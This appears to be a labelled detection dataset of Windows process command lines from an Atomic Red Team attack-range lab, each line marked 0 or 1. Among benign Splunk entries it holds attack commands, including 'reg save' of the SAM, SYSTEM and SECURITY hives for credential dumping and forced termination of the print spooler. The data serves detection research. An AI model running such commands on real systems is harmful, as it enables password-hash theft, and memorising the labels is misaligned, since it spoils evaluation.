AQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkA winrshost.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBC57.tmp" "c:\Users\Administrator\AppData\Local\Temp\byyqvq2r\CSC35A26D4DB86D49788A25632DCAD13FEF.TMP"
0
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme" splunkd.exe ar-win-2.attackrange.local
1
cmd.exe "cmd.exe" /c "taskkill.exe /f /im spoolsv.exe" powershell.exe ar-win-2.attackrange.local
1
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\AtomicRedTeam\ExternalPayloads\T1059.003_script.bat" " powershell.exe ar-win-dc.attackrange.local
1
cmd.exe "cmd.exe" /c "" powershell.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe chcp.com "C:\Windows\system32\chcp.com" 65001
0
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme" splunkd.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local AR-WIN-2$ C:\Windows\System32\cmd.exe btool.exe "C:\Program Files\SplunkUniversalForwarder\bin\btool.exe" server list replication_port --no-log
0
cmd.exe C:\Windows\System32\cmd.exe /c "taskkill.exe /f /im spoolsv.exe" powershell.exe ar-win-dc.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0
cmd.exe C:\Windows\System32\cmd.exe /c "icacls 'C:\Users\Public\*' /restore %temp%\T1222.001-folder-perms-backup.txt /q >nul 2>&1" powershell.exe ar-win-2.attackrange.local
1
cmd.exe "C:\Windows\system32\cmd.exe" /c "IF EXIST %%temp%%\T1222.001_takeown_folder ( EXIT 0 ) ELSE ( EXIT 1 )" powershell.exe ar-win-dc.attackrange.local
1
reg.exe reg.exe reg save HKLM\sam C:\Users\ADMINI~1\AppData\Local\Temp\sam cmd.exe "cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" ar-win-dc.attackrange.local Administrator
1
cmd.exe C:\Windows\System32\cmd.exe /c "schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 & schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1" powershell.exe ar-win-dc.attackrange.local
1
cmd.exe C:\Windows\system32\cmd.exe /c btool web list settings --no-log splunk.exe ar-win-2.attackrange.local
1
ar-win-2.attackrange.local Administrator C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe HOSTNAME.EXE "C:\Windows\system32\HOSTNAME.EXE"
0